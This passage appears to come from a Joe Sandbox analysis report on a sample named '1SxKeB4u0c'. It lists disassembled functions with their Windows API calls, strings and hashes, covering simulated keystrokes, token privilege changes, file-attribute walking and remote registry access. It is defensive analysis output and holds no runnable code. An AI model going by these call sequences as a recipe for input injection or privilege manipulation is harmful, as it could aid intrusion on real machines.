                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$_memset
                                                                              • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                                              • API String ID: 1357608183-1426331590
                                                                              • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                              • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                                              • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                              • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                                              Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                                              • IsIconic.USER32(?), ref: 0043D66E
                                                                              • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                                              • SetForegroundWindow.USER32(?), ref: 0043D685
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                                              • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                                              • SetForegroundWindow.USER32(?), ref: 0043D721
                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 4125248594-2988720461
                                                                              • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                              • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                                              • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                              • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                                              Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                              • _memset.LIBCMT ref: 00458353
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                                              • CloseHandle.KERNEL32(?), ref: 004583B6
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                                              • GetProcessWindowStation.USER32 ref: 004583E6
                                                                              • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                                                • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2063423040-1027155976
                                                                              • Opcode ID: 44150fea63d3621502c99f43e5308078f74b087076934076f4f29801822f52ed
                                                                              • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                                              • Opcode Fuzzy Hash: 44150fea63d3621502c99f43e5308078f74b087076934076f4f29801822f52ed
                                                                              • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                                              Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                                              • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                                              • __swprintf.LIBCMT ref: 0046C890
                                                                              • __swprintf.LIBCMT ref: 0046C8D3
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                              • __swprintf.LIBCMT ref: 0046C927
                                                                                • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                                              • __swprintf.LIBCMT ref: 0046C975
                                                                                • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                                                • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                                              • __swprintf.LIBCMT ref: 0046C9C4
                                                                              • __swprintf.LIBCMT ref: 0046CA13
                                                                              • __swprintf.LIBCMT ref: 0046CA62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 3953360268-2428617273
                                                                              • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                              • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                                              • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                              • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                                              Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0046EFB6
                                                                              • _wcscmp.LIBCMT ref: 0046EFCB
                                                                              • _wcscmp.LIBCMT ref: 0046EFE2
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F031
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                                              • _wcscmp.LIBCMT ref: 0046F074
                                                                              • _wcscmp.LIBCMT ref: 0046F08B
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                                              • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1803514871-438819550
                                                                              • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                              • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                                              • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                              • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                                              Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                              • API String ID: 536824911-966354055
                                                                              • Opcode ID: f7fe398b0a6251fe003052b783ea5a901d9b04f0cf4847914aaf135240fa48bd
                                                                              • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                                              • Opcode Fuzzy Hash: f7fe398b0a6251fe003052b783ea5a901d9b04f0cf4847914aaf135240fa48bd
                                                                              • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                                              Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                                              • API String ID: 0-559809668
                                                                              • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                              • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                                              • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                              • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                                              Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0046F113
                                                                              • _wcscmp.LIBCMT ref: 0046F128
                                                                              • _wcscmp.LIBCMT ref: 0046F13F
                                                                                • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                              • _wcscmp.LIBCMT ref: 0046F1BC
                                                                              • _wcscmp.LIBCMT ref: 0046F1D3
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                              • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 1824444939-438819550
                                                                              • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                              • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                                              • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                              • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                                              Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                              • __swprintf.LIBCMT ref: 0046A231
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                              • _memset.LIBCMT ref: 0046A2B2
                                                                              • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 2733774712-3457252023
                                                                              • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                              • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                                              • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                              • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                                              Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 00460097
                                                                              • SetKeyboardState.USER32(?), ref: 00460102
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                                              • GetKeyState.USER32(000000A0), ref: 00460139
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                                              • GetKeyState.USER32(000000A1), ref: 00460179
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                                              • GetKeyState.USER32(00000011), ref: 004601B3
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                                              • GetKeyState.USER32(00000012), ref: 004601EA
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                                              • GetKeyState.USER32(0000005B), ref: 00460221
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                              • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                                              • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                              • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                                              Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1240663315-0
                                                                              • Opcode ID: 35491d877236a63b1427915f2f37c1e8b310e57b8b745a6dccbb1f539d16618d
                                                                              • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                                              • Opcode Fuzzy Hash: 35491d877236a63b1427915f2f37c1e8b310e57b8b745a6dccbb1f539d16618d
                                                                              • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                                              Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
